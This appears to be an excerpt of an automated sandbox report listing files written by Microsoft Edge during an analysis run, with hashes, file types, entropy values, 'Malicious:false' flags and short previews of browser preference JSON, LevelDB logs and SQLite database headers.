                                                                                                                                                                                                                                                                                              SSDEEP:768:cMkbJrT8IeQc5WofcQIuhDO6vP6OBDIvlqg5WbR6FFSsKRTxOCAolGoup1Xl3jV+:cMk1rT8Heof06tIv8s9Rolhu3VlXr4t
                                                                                                                                                                                                                                                                                              MD5:D7175A9FA79FC58FD7E1509F0BBEFAAD
                                                                                                                                                                                                                                                                                              SHA1:9A40381545F62CEC951359D8A5F4FC27AEF239EB
                                                                                                                                                                                                                                                                                              SHA-256:4A175CEC4D06A8420F54DE57544AE6BA8BA593F6236B2599A2D7EECDACBA107D
                                                                                                                                                                                                                                                                                              SHA-512:AAA45D223ACC48DA66ADE001FDED5F630E561C6CBF91560F5E4ABCCE5DDF0785F526EE6ABA19D9FA96699DCFBAF918D11C9E1B5800C12422FFED262F3B348CF0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):44656
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.096988522185395
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkBzwuohDO6vP6OBDIvlqg5WbR6FFScGoup1Xl3jVz6:z/Ps+wsI7yOEd6tIv4chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                              MD5:C12E2AFAA04764C46F6ECA016617499F
                                                                                                                                                                                                                                                                                              SHA1:D7CC44A9D80BCCE8333BBAFBE47C13F52F2E6586
                                                                                                                                                                                                                                                                                              SHA-256:FDF4B71450010DAFA9D646081F5C054E4E9E2DA223D831677420C70B55CFB587
                                                                                                                                                                                                                                                                                              SHA-512:A5C094ACDC482E070297036DB75DFB1B8178AD6A4F07E9C181DDB9758A401E715FD32633A4F3D345F8DF6E61441A06838630475EDEC5E3482C6E774FC78C0200
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):107893
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.6401415786958475
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7L:fwUQC5VwBIiElEd2K57P7L
                                                                                                                                                                                                                                                                                              MD5:8574D972959B295FEA388493B825FDF1
                                                                                                                                                                                                                                                                                              SHA1:388510DBD841625F1DFFC1347A4C41B8AF07B23C
                                                                                                                                                                                                                                                                                              SHA-256:8520149C20006B78EBBDCD489C459D56B922C235102433F8D4C5A440ABA6E776
                                                                                                                                                                                                                                                                                              SHA-512:E50D2B5D7ED6A634865875A570CA441CD6C3AA68ED181C4329E2BDE3AA06929DA02E4D1900691C88B3D7A501AB5223140969CCDE4C2B670F0937A2A75DFA763D
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3::
                                                                                                                                                                                                                                                                                              MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                                                              SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                                                              SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                                                              SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:DIY-Thermocam raw data (Lepton 3.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 134217728.000000, slope 75015551881388056232440365056.000000
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.44366059988538836
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:gi6S/uOyMPSp0VXxm0/Ug1HFq2G9o1ytuaU02QbcDca+oKJzMg1HF:+S/LPO01o0/UaHlGayoPQbQcjo0MaH
                                                                                                                                                                                                                                                                                              MD5:4336203DC9FB11F74332BAC4996B9B35
                                                                                                                                                                                                                                                                                              SHA1:796B72098544E42CCCA906E98E87158C1005A30A
                                                                                                                                                                                                                                                                                              SHA-256:54E1034F7169A232106B50425467F34731F4995A4E0FCB9287F1E1938BEFD33F
                                                                                                                                                                                                                                                                                              SHA-512:A94BCD21D6A46355D697DBECA9E6FDF4BC8523D4EA70418F878D5EDD8D24EF305D796C4C9380A1489B6A301EF89F5B878D72FED4EDD4F6D267618978C9763678
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):4194304
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.044517546143449195
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:viWi0o3tmTUIaddxJg+0UggrXp1IOPkt1kKh1PNEQpV1gQscoDwMegn8y08Tcm2D:v7i0stsUDdn4hJNfgQoD1/08T2RGOD
                                                                                                                                                                                                                                                                                              MD5:0F4039019DA3AE2353924CAE447D67C2
                                                                                                                                                                                                                                                                                              SHA1:C33F22CCB29AF8E7F9E503AB0A368893C7A621C2
                                                                                                                                                                                                                                                                                              SHA-256:614E4B17F5E19A84E5F79A26D7945F353A9D734016223C7774921F65C60BAB1E
                                                                                                                                                                                                                                                                                              SHA-512:321B3D7D794C3C12449F6DFBCE0E7A138E5F8752ADDFA08FB296E72084F3234A23BB9EC947DDBCFE176AAECBEC953C42595016A690AB27315AD5834D92FAD6CA
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):280
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.124898764628895
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5etll:o1ApdeaEqYsMazlYBVsJDu2ziy5eX
                                                                                                                                                                                                                                                                                              MD5:58C4D8DE72E3ECED51A6FA470EDB0B3F
                                                                                                                                                                                                                                                                                              SHA1:EFBC52CA094310145103EB9A42AEDB37433E8C2D
                                                                                                                                                                                                                                                                                              SHA-256:A0EA6C0BD7828E1691C2FB39D7B7CD642628E253684A809F814D9E25D8BE3F9F
                                                                                                                                                                                                                                                                                              SHA-512:E92DEC4B52EA5786AADE4B675BAE5C8DDA0139064F82C71D37F5782D54894AA1BCAECBE9E4892D73D686724508857347BECD30D658267346B3DEBF1136C29A90
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40504
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.5609767962997045
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:AFOJJU7pLGLPQuWPZhfEs8F1+UoAYDCx9Tuqh0VfUC9xbog/OVb1lOCGcrwIVl7A:AFOJJYcPQuWPZhfEsu1jaC1lTGVIVleN
                                                                                                                                                                                                                                                                                              MD5:D972DDDC994E619FFD5508ABF5A9D61D
                                                                                                                                                                                                                                                                                              SHA1:8FB7DBEAD3C5B5DB67ABF68F9391942D9F9A46AA
                                                                                                                                                                                                                                                                                              SHA-256:2058C96EF27CF899ED8B042E547FAAF7DE64F3D3C49CC5457AE9BD18809603BF
                                                                                                                                                                                                                                                                                              SHA-512:7500DDC2192234296A30C2ACC12254405F9ECC6B02D8C38A695E096ED95D2569DC1D24A5E5FCF96641F2C618359A8CDE11A0C85B90EB7B43E01C16D3F224B29B
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326019029821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326019029821","location":5,"ma
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):13333
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.266031253224988
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:stMPGo4Su4sfgfhOkdbGix6W0OBylaTYG:sOOoPuzgfpdbGix4aTYG
                                                                                                                                                                                                                                                                                              MD5:583EB669BEB122673176EBAE774F4E00
                                                                                                                                                                                                                                                                                              SHA1:31332DD5C056140F60F2CE389CD64077D4D8E660
                                                                                                                                                                                                                                                                                              SHA-256:7E9145E7BC1593B86F9DBE393BF3E2CF1F801B463500E287E8F3ECAA83F6A6BF
                                                                                                                                                                                                                                                                                              SHA-512:BF085D014838C02A97CE5A47544C0CDFB50F42E54898E8D142C1101347811938656A24E08BD5D67B94CD0D07D49C5CC8BDB9D798A4E8A78E120EE2E65231E44C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326020367279","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):9261
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.098540041339969
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:192:stkSWsfgsZihnkAaU3T88bV+FiA66WtaFIMYIP+YJ:stk5sfgfhxPbGix6WtaTYG
                                                                                                                                                                                                                                                                                              MD5:104022127F755F994BA7CAB36AFF0680
                                                                                                                                                                                                                                                                                              SHA1:A987BA328707BB66AD30BD4D708CA251F13B5327
                                                                                                                                                                                                                                                                                              SHA-256:F70FAC7EEFFBA4CABB35E1AF343369A3E6C92CCA5893D67A1BD14C859E245694
                                                                                                                                                                                                                                                                                              SHA-512:1C43FDB15052E8C03DEEC494F957CB5339144070767926EEDBB38456F5A77164609901458B7D96810A6809984EA6037320303FA1F8C7A4AE81AE2BD1643D388A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326020367279","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":1023,"browser_content_container_width":1280,"browser_content_container_x":0,"browser_content_container_y":0,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"dips_timer_last_update":"13378326019801415","domain_dive
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):115717
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                              MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                              SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                              SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                              SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):25012
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.5671885608363025
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378326019029821","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378326019029821","location":5,"ma
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):13168
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.268189313702032
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326020367279","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):33
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):309
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.211190129933816
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:25.186 1d0c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/10-12:40:25.388 1d0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):2163821
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.222851513879229
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:v+/PN8FnfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN8Bfx2mjF
                                                                                                                                                                                                                                                                                              MD5:38EE1C1E0814DB4F09B31D5FEE0755C5
                                                                                                                                                                                                                                                                                              SHA1:4EA1BB79E079893CCD91913FCF355456607E9D9A
                                                                                                                                                                                                                                                                                              SHA-256:9ABB5FEA5F879BAB44E0269F933714FD696062EE00914B5374048ACA51E7189E
                                                                                                                                                                                                                                                                                              SHA-512:C53A640C58F6149B6BB8548D46C4950125C004DE21C8750993D2A3D54F7873172DB6A71CFA91F2DFE0BC1C5625438E515118A3AD11286980362BB733392080B7
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):336
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.061854932513341
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L4+q2P923oH+Tcwt9Eh1tIFUt8OLoXZmw+OLMruVkwO923oH+Tcwt9Eh15LJ:78+v4Yeb9Eh16FUt8OQ/+OgyV5LYeb9O
                                                                                                                                                                                                                                                                                              MD5:638257C205953519306B9B89E8F7668C
                                                                                                                                                                                                                                                                                              SHA1:6FBEF733EACE7A138FE227E054AB62ECD15F9BF0
                                                                                                                                                                                                                                                                                              SHA-256:EA776AA59B8A9E66F4BB96C1075DCD3F83BE8661998947AA9FF6B1A7E5712FF0
                                                                                                                                                                                                                                                                                              SHA-512:22C4F1CD4EBE1FA41719BDF257B5277D334AAA0CD4941E9C6AFA543BD5C540A98E31BE9E9321E739F4F6D57188CB24401178D1DE65E39D40C503593B55CEE57F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:24.884 20dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/10-12:40:24.888 20dc Recovering log #3.2024/12/10-12:40:24.894 20dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 34, database pages 18, cookie 0x19, schema 4, UTF-8, version-valid-for 34
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.4947385728088827
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:xR94jweGq2L4H7pgNPdQyoDbel9myJrDVb4:f94ZBS4FgNPdPl9myRDVb4
                                                                                                                                                                                                                                                                                              MD5:29C9AF42D59BA452C914D337F83778D8
                                                                                                                                                                                                                                                                                              SHA1:0D4075E73B0189BD28D6968499DCFDE5975116CB
                                                                                                                                                                                                                                                                                              SHA-256:DFDAE22D17235546DAF4200A5920C46B10E0885D9A0BE747D3DE14F432817613
                                                                                                                                                                                                                                                                                              SHA-512:DB03C53D1CC2AE5E1E7882437730454AC27842FE5211A6DBDBBB5131EB0D607DB5D2F26EADB08CD9BAD90FD93D6E04A2C27361FE5BD1B510467D2E9BAEF90FBE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..."..................................................................."..j....................0...{...h.6.~.%...U........................................................................................................................................................................................................................................................................................................................................................................G...##..Utablecollectionscollections.CREATE TABLE collections ( id LONGVARCHAR PRIMARY KEY, date_created REAL NOT NULL, date_modified REAL NOT NULL, title LONGVARCHAR NOT NULL, position INTEGER NOT NULL, is_syncable INTEGER DEFAULT 1, suggestion_url LONGVARCHAR, suggestion_dismissed INTEGER, suggestion_type INTEGER, thumbnail BLOB, is_custom_thumbnail INTEGER NOT NULL DEFAULT 0, tag LONGVARCHAR, thumbnail_url LONGVARCHAR, is_marked_for_deletion INTEGER)..........tableitemsitems.CREATE TABLE items
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):28672
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.43508159006069336
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBI:TouQq3qh7z3bY2LNW9WMcUvB
                                                                                                                                                                                                                                                                                              MD5:F5237AED0F897E7619A94843845A3EC3
                                                                                                                                                                                                                                                                                              SHA1:A0C752C9C28A753CFB051AACE2ADA78A6D1288C3
                                                                                                                                                                                                                                                                                              SHA-256:D4463972AD7B1582F05C8E17074CE863D45CA625C2C672DB0D37F3AF4C7ACE42
                                                                                                                                                                                                                                                                                              SHA-512:D3C9718794E455D415D8EDF23B576E0A70356B8D71B8DD374D25B8065FEF608E114E13395B4B54462739882A141F4DBE00E3A370D6E4160504428A849CC893A3
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
